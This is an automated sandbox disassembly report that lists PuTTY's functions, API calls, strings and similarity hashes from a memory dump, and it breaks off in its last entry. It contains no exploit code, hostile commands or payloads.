%02x%s, xrefs: 00CA4D5B, 00CA4D74, 00CA4D8D, 00CA4DA6, 00CA4DBF, 00CA4DD8, 00CA4DF1, 00CA4E0A, 00CA4E23, 00CA4E3C, 00CA4E55, 00CA4E6E, 00CA4E87, 00CA4EA0, 00CA4EB9, 00CA4ED2
false && "ssh_fptype_from_cert ruled out the other values", xrefs: 00CA5168
%.*s %d , xrefs: 00CA50BF
%s (with certificate: %s), xrefs: 00CA51F4
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/sshpubk.c, xrefs: 00CA5163
SHA256:, xrefs: 00CA4F03

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: _strlen
String ID: %.*s $%.*s %d $%02x%s$%s (with certificate: %s)$/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/sshpubk.c$SHA256:$false && "ssh_fptype_from_cert ruled out the other values"
API String ID: 4218353326-3795965706
Opcode ID: 70e027a3ec10c81049811124c7dcae74149ee8e491d63a757c339ecddbfba171
Instruction ID: c6a472a1d30c758b74714daf359582ff9900531e4f58a0fcf2f41fd09dc7e12c
Opcode Fuzzy Hash: 70e027a3ec10c81049811124c7dcae74149ee8e491d63a757c339ecddbfba171
Instruction Fuzzy Hash: B1D107A59443103FD6007621BC47E7F7BAC8F9671CF084819FA5896283E7659B08DAF3

Uniqueness

Uniqueness Score: -1.00%

Function 00C63F60 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 356comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00D0E938,00000000,00000001,00D0E928), ref: 00C63FA5
CoCreateInstance.OLE32(00D0E938,00000000,00000001,00D0E928,00000000), ref: 00C6403F
CoCreateInstance.OLE32(00D0E968,00000000,00000001,00D0E958,00000000), ref: 00C6409E

Strings

Pageant.exe, xrefs: 00C6423A, 00C64250
Recent Sessions, xrefs: 00C64210

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: CreateInstance
String ID: Pageant.exe$Recent Sessions
API String ID: 542301482-148644000
Opcode ID: d36442ab9bc6994dc6b0c00b2af0a71c7539063da6b9953be11afd11302e3250
Instruction ID: 3da1159a67d7aeb5a39964eac842f95f0ab609f97f470972cb3dbde5039aeaac
Opcode Fuzzy Hash: d36442ab9bc6994dc6b0c00b2af0a71c7539063da6b9953be11afd11302e3250
Instruction Fuzzy Hash: 90C17E74604301AFD728DF60D889F2B77E9AF89704F04486CF949CB291DB75E949CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00C755C0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 182networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(00000000,00000000,?,-0000000C), ref: 00C75687
inet_addr.WS2_32(?), ref: 00C756B1
htonl.WS2_32(00000000), ref: 00C756D7

Part of subcall function 00C91300: _strcspn.LIBCMT ref: 00C91351

gethostbyname.WS2_32(?), ref: 00C7573C
htonl.WS2_32(?), ref: 00C75798
WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,00C8E30C,?,?,?), ref: 00C757C6

Strings

Host does not exist, xrefs: 00C757EF
Host not found, xrefs: 00C7571D
Network is down, xrefs: 00C757E8

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: htonl$ErrorLast_strcspngetaddrinfogethostbynameinet_addr
String ID: Host does not exist$Host not found$Network is down
API String ID: 4231317714-2906891963
Opcode ID: 065a57d3ed3d532776b113c7f946eb5bfbe60e753aa44a4fd68c194eb929fb1d
Instruction ID: 32a7d5a284e1bb0c4b2d64b2fbd30ea87878d9e3087f7254f39bb9923823e822
Opcode Fuzzy Hash: 065a57d3ed3d532776b113c7f946eb5bfbe60e753aa44a4fd68c194eb929fb1d
Instruction Fuzzy Hash: AF51A1B4604701DFE7249F24D889B2A77E4EB45318F148828F85ECB392E7B5E944DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00C742A0 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00C7BC00: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 00C7BC76
Part of subcall function 00C7BC00: RegCloseKey.ADVAPI32(?), ref: 00C7BCBA

Part of subcall function 00C7EA00: _strlen.LIBCMT ref: 00C7EA0B

Part of subcall function 00C7BE40: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00C746D1,00000000,RandSeedFile), ref: 00C7BE67
Part of subcall function 00C7BE40: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000), ref: 00C7BE9F

_strlen.LIBCMT ref: 00C74314

Part of subcall function 00C7BF40: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00C74993,00000000,Recent sessions), ref: 00C7BF66
Part of subcall function 00C7BF40: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000), ref: 00C7BF9D

Part of subcall function 00CA1690: _strlen.LIBCMT ref: 00CA16A6

_strlen.LIBCMT ref: 00C7433E

Strings

Software\SimonTatham\PuTTY\SshHostCAs, xrefs: 00C742CA
PublicKey, xrefs: 00C742FF
PermitRSASHA256, xrefs: 00C74405
MatchHosts, xrefs: 00C74368
Validity, xrefs: 00C74329
PermitRSASHA1, xrefs: 00C743EA
PermitRSASHA512, xrefs: 00C74420

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: QueryValue_strlen$CloseCreate
String ID: MatchHosts$PermitRSASHA1$PermitRSASHA256$PermitRSASHA512$PublicKey$Software\SimonTatham\PuTTY\SshHostCAs$Validity
API String ID: 3351441687-2091482613
Opcode ID: 88ec3d9a2191fa6174edafc81671c0a648f1e3a78f7045c940dbaabd59fc8dc2
Instruction ID: c50b9ef681bf5ccce7e3794562760918fad3ad0fd950c34f9c36f77d3fbb4f8f
Opcode Fuzzy Hash: 88ec3d9a2191fa6174edafc81671c0a648f1e3a78f7045c940dbaabd59fc8dc2
Instruction Fuzzy Hash: 8F4194E9D043016BE6106B30AC42B3F76D89F55759F088828FD8E96243F775DD14E6A3

Uniqueness

Uniqueness Score: -1.00%

Function 00C41E64 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00C41EA7
TrackPopupMenu.USER32(00000002,?,?,00000000,?,00000000), ref: 00C41EC8
ShowCursor.USER32(00000001), ref: 00C42670
GetCursorPos.USER32(?), ref: 00C42682
IsZoomed.USER32 ref: 00C426F5
GetWindowLongA.USER32(000000F0), ref: 00C42707
SendMessageA.USER32(?,00000112,0000F090,?), ref: 00C4273D
DefWindowProcW.USER32(?,?,?,?), ref: 00C43520

Strings

(, xrefs: 00C426AA

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Cursor$Window$LongMenuMessagePopupProcSendShowTrackZoomed
String ID: (
API String ID: 3382111338-3887548279
Opcode ID: b303374ee57aceaceb411800c6f3ad0509778d821fd52ac96cc6f61d0326c459
Instruction ID: 2bc79050ab906b639d135e929df1a4e428e2d36098bee4adb9ed6175e4ac6f3d
Opcode Fuzzy Hash: b303374ee57aceaceb411800c6f3ad0509778d821fd52ac96cc6f61d0326c459
Instruction Fuzzy Hash: 9341D679608340AFE7205F20EC4ABAA7BE5FB45710F44842CF685C62A1DBB59D44EF71

Uniqueness

Uniqueness Score: -1.00%

Function 00C74460 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 00C7BC00: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 00C7BC76
Part of subcall function 00C7BC00: RegCloseKey.ADVAPI32(?), ref: 00C7BCBA

Part of subcall function 00C7BF00: _strlen.LIBCMT ref: 00C7BF10
Part of subcall function 00C7BF00: RegSetValueExA.ADVAPI32(00C7423C,?,00000000,00000001,00000000,-00000001,?,?,?,?,?,?,?,?,?,?), ref: 00C7BF23

_strlen.LIBCMT ref: 00C744E1

Part of subcall function 00CA7450: ___from_strstr_to_strchr.LIBCMT ref: 00CA74A5

Part of subcall function 00C7BE00: RegSetValueExA.ADVAPI32(00000000,00C74520,00000000,00000004,00000000,00000004,?,00000000,00C74520,00000000,PermitRSASHA1,?), ref: 00C7BE22

Part of subcall function 00C7BCE0: RegCloseKey.ADVAPI32(00000000,00C746DC,00000000), ref: 00C7BCE4

Strings

Software\SimonTatham\PuTTY\SshHostCAs, xrefs: 00C74488, 00C74567
PublicKey, xrefs: 00C744C6
PermitRSASHA256, xrefs: 00C74528
Validity, xrefs: 00C744F9
CA record must have a name, xrefs: 00C74556
PermitRSASHA1, xrefs: 00C74515
PermitRSASHA512, xrefs: 00C7453B
Unable to create registry keyHKEY_CURRENT_USER\%s\%s, xrefs: 00C7456C

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: CloseValue_strlen$Create___from_strstr_to_strchr
String ID: CA record must have a name$PermitRSASHA1$PermitRSASHA256$PermitRSASHA512$PublicKey$Software\SimonTatham\PuTTY\SshHostCAs$Unable to create registry keyHKEY_CURRENT_USER\%s\%s$Validity
API String ID: 1175142446-1463427279
Opcode ID: 518a63c0ce100046fb4cb96e70feef917cd5a3b797fb5474618ecf15eb3f87e1
Instruction ID: 429ca3e2c0181bf006f22f2e2e870b62072d13e2cc10b6b7fa76ec8abf61c993
Opcode Fuzzy Hash: 518a63c0ce100046fb4cb96e70feef917cd5a3b797fb5474618ecf15eb3f87e1
Instruction Fuzzy Hash: 59218FEA9001147FE70276607C43E7A3A599F62758F098070FD0C99253FB529E29A6F7

Uniqueness

Uniqueness Score: -1.00%

Function 00C5F810 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00C7BAA0: LoadLibraryA.KERNELBASE(00000000,00000000,?,00C89C90,kernel32.dll), ref: 00C7BABF

GetProcAddress.KERNEL32(00000000,InitCommonControls), ref: 00C5F82D
GetProcAddress.KERNEL32(00000000,MakeDragList), ref: 00C5F83A
GetProcAddress.KERNEL32(00000000,LBItemFromPt), ref: 00C5F847
GetProcAddress.KERNEL32(00000000,DrawInsert), ref: 00C5F854

Strings

MakeDragList, xrefs: 00C5F834
DrawInsert, xrefs: 00C5F84E
InitCommonControls, xrefs: 00C5F827
LBItemFromPt, xrefs: 00C5F841
comctl32.dll, xrefs: 00C5F812

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: DrawInsert$InitCommonControls$LBItemFromPt$MakeDragList$comctl32.dll
API String ID: 2238633743-1292723818
Opcode ID: e6b3f249a9fc753351784ea4999e80656e966fc8201ca41fe2df6ac7e6249f3c
Instruction ID: deab41db29611eeca0296b209c00cc4f4851a44583fec7956fde8dbb5be99a5f
Opcode Fuzzy Hash: e6b3f249a9fc753351784ea4999e80656e966fc8201ca41fe2df6ac7e6249f3c
Instruction Fuzzy Hash: 50E092B5941725BFA240AF66BC42CBEBA98EE527503410136F404D2360EBF085459EBA

Uniqueness

Uniqueness Score: -1.00%

Function 00C68E30 Relevance: 15.1, APIs: 10, Instructions: 92threadtimeclipboardCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00C68E42
GetCapture.USER32 ref: 00C68E5D
GetClipboardOwner.USER32 ref: 00C68E74
GetQueueStatus.USER32(00001CBF), ref: 00C68E90
GetCursorPos.USER32(?), ref: 00C68EB0
GlobalMemoryStatus.KERNEL32 ref: 00C68EC6
GetCurrentThread.KERNEL32 ref: 00C68EE5
GetThreadTimes.KERNEL32(00000000,?,?,?,?), ref: 00C68EF4
GetCurrentProcess.KERNEL32 ref: 00C68F07
GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 00C68F12

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: CurrentProcessStatusThreadTimes$CaptureClipboardCursorForegroundGlobalMemoryOwnerQueueWindow
String ID:
API String ID: 3596705544-0
Opcode ID: 01468b11ac8c1b165e7baba28fe5db443c5788f761c0d6aa7063b2accfc38bad
Instruction ID: 839bdb8547163e6f3100964f2206ff7389a3da6f8c6fa9e585a62d7e9fdf3335
Opcode Fuzzy Hash: 01468b11ac8c1b165e7baba28fe5db443c5788f761c0d6aa7063b2accfc38bad
Instruction Fuzzy Hash: 97218DB29413007BD3206BA1BC4FF5B7F68EF89798F040519F60996282EEB15509CBB3

Uniqueness

Uniqueness Score: -1.00%

Function 00C86CA0 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 312COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00C86EBE

Strings

A46, xrefs: 00C86D3F, 00C86D4E
%s%s, xrefs: 00C86E52
Specified forwarding already exists, xrefs: 00C86FCB
You need to specify a source port number, xrefs: 00C86F5E
%s, xrefs: 00C86EAC
You need to specify a destination addressin the form "host.name:port", xrefs: 00C86FE8
LRD, xrefs: 00C86DB2, 00C86DBA, 00C86DFC

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ___from_strstr_to_strchr
String ID: %s$%s%s$A46$LRD$Specified forwarding already exists$You need to specify a destination addressin the form "host.name:port"$You need to specify a source port number
API String ID: 601868998-44983218
Opcode ID: ae16575fd0ab72018765ba374addc44b32a4350208cb27e037fe13677c7aa726
Instruction ID: 6fe7db544dd6e496e9e4587db837192be6067e844edc971a4c5fd51dce717bf7
Opcode Fuzzy Hash: ae16575fd0ab72018765ba374addc44b32a4350208cb27e037fe13677c7aa726
Instruction Fuzzy Hash: 5C9105B5A043007BD7217625AC83E2B7AA9DF9134CF084438FD4996253F622EE14A773

Uniqueness

Uniqueness Score: -1.00%

Function 00D02189 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00D022A8
___TypeMatch.LIBVCRUNTIME ref: 00D023B6
CatchIt.LIBVCRUNTIME ref: 00D02407
_UnwindNestedFrames.LIBCMT ref: 00D02508
CallUnexpected.LIBVCRUNTIME ref: 00D02523

Strings

csm, xrefs: 00D022DF
csm, xrefs: 00D021C6
csm, xrefs: 00D02233

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4119006552-393685449
Opcode ID: 05e00c0d773207919308f3a837974cded40fff7bd2c9de8a94505b6149f5ef2c
Instruction ID: 5f3a4a4f80cadb8ca248de88ab66e7771d7126b8c84fae506de9b43a14246af5
Opcode Fuzzy Hash: 05e00c0d773207919308f3a837974cded40fff7bd2c9de8a94505b6149f5ef2c
Instruction Fuzzy Hash: 67B18D71801209EFCF15DFA4C889ABEB7B5FF24310B18415AE9196B292D334DA51CFB2

Uniqueness

Uniqueness Score: -1.00%

Function 00C6B564 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 303COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00C6B58D
_strlen.LIBCMT ref: 00C6B5BB

Part of subcall function 00C650B0: ___from_strstr_to_strchr.LIBCMT ref: 00C650C5
Part of subcall function 00C650B0: ___from_strstr_to_strchr.LIBCMT ref: 00C650D4

Strings

server subnegotiation: SB TTYPE SEND, xrefs: 00C6B539
server subnegotiation: SB TSPEED <something weird>, xrefs: 00C6B60C
client subnegotiation: SB TSPEED IS %s, xrefs: 00C6B5EF
server subnegotiation: SB TSPEED SEND, xrefs: 00C6B5DE
client subnegotiation: SB TTYPE IS %s, xrefs: 00C6B54F

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ___from_strstr_to_strchr_strlen
String ID: client subnegotiation: SB TSPEED IS %s$client subnegotiation: SB TTYPE IS %s$server subnegotiation: SB TSPEED <something weird>$server subnegotiation: SB TSPEED SEND$server subnegotiation: SB TTYPE SEND
API String ID: 1576176021-3164916790
Opcode ID: 9177fdf8b787bd99fdb4802022c3af72ba1a41b7aed3bab004a2f33378ad423f
Instruction ID: 07edf8a9838954340f0377a85195fb3410f9dc2d6f1a0ae25e4cbf81f0ecb163
Opcode Fuzzy Hash: 9177fdf8b787bd99fdb4802022c3af72ba1a41b7aed3bab004a2f33378ad423f
Instruction Fuzzy Hash: 72A14A70A08301EFD7309B28CC85B2ABB99AF51318F148629F469CB3E2D732DD95D752

Uniqueness

Uniqueness Score: -1.00%

Function 00C62BC0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 95COMMON

Download Yara Rule

APIs

SetDlgItemTextA.USER32(00000000,?,00000000), ref: 00C62CA5

Strings

pixel, xrefs: 00C62C5F
Font: %s, %sdefault height, xrefs: 00C62C8C
point, xrefs: 00C62C64, 00C62C73
Font: %s, %s%d-%s, xrefs: 00C62C79
bold, , xrefs: 00C62C50, 00C62C75, 00C62C88
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c, xrefs: 00C62C1E
c && c->ctrl->type == CTRL_FONTSELECT, xrefs: 00C62C23

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ItemText
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c$Font: %s, %s%d-%s$Font: %s, %sdefault height$bold, $c && c->ctrl->type == CTRL_FONTSELECT$pixel$point
API String ID: 3367045223-3338255871
Opcode ID: 0ed899270b9af8d55511fa2da4115dcc049c6380637d9104016bdd64ce9eb9fd
Instruction ID: e5cde9e660509e6ab88c5ff0db976586cd7589f80393528b3b6d7891f8f9ed6b
Opcode Fuzzy Hash: 0ed899270b9af8d55511fa2da4115dcc049c6380637d9104016bdd64ce9eb9fd
Instruction Fuzzy Hash: 4B21F9B2900204BFE7106F11EC82E2B7799EB85304F094038F81997253E632ED15D762

Uniqueness

Uniqueness Score: -1.00%

Function 00C768F0 Relevance: 13.8, APIs: 9, Instructions: 325networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,00005000,00000001), ref: 00C76A98
accept.WS2_32(?,?,00000080), ref: 00C76AE8
WSAGetLastError.WS2_32 ref: 00C76AF5
closesocket.WS2_32(00000000), ref: 00C76B48
recv.WS2_32(?,?,00005000,00000000), ref: 00C76BDB
ioctlsocket.WS2_32(?,40047307,00000001), ref: 00C76C4E
WSAGetLastError.WS2_32 ref: 00C76C60
recv.WS2_32(?,?,00005000,00000000), ref: 00C76C80
WSAGetLastError.WS2_32 ref: 00C76CB1

Part of subcall function 00C68F40: GetTickCount.KERNEL32 ref: 00C68F68
Part of subcall function 00C68F40: QueryPerformanceCounter.KERNEL32 ref: 00C68F86

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ErrorLastrecv$CountCounterPerformanceQueryTickacceptclosesocketioctlsocket
String ID:
API String ID: 2595003436-0
Opcode ID: 1af292780ececab43c65ce052b3a2ed03dd4d47986a4913bcd3255b3bf0c0529
Instruction ID: 07dd2be41854c25eec5dc60f21eee39789ce06758e1811f39362cfa275e358eb
Opcode Fuzzy Hash: 1af292780ececab43c65ce052b3a2ed03dd4d47986a4913bcd3255b3bf0c0529
Instruction Fuzzy Hash: 49B1AEB1600B00AFE725DF24CC85B2BB7A9EF84704F54882CF99A87291D771F944DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00D03387 Relevance: 13.8, APIs: 9, Instructions: 273COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00D03772: CreateFileW.KERNEL32(00000000,00000000,?,00D03430,?,?,00000000,?,00D03430,00000000,0000000C), ref: 00D0378F

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C64E35), ref: 00D0349B
__dosmaperr.LIBCMT ref: 00D034A2
GetFileType.KERNEL32(00000000), ref: 00D034AE
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C64E35), ref: 00D034B8
__dosmaperr.LIBCMT ref: 00D034C1
CloseHandle.KERNEL32(00000000), ref: 00D034E1
CloseHandle.KERNEL32(00CFC6F4), ref: 00D0362E
GetLastError.KERNEL32 ref: 00D03660
__dosmaperr.LIBCMT ref: 00D03667

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
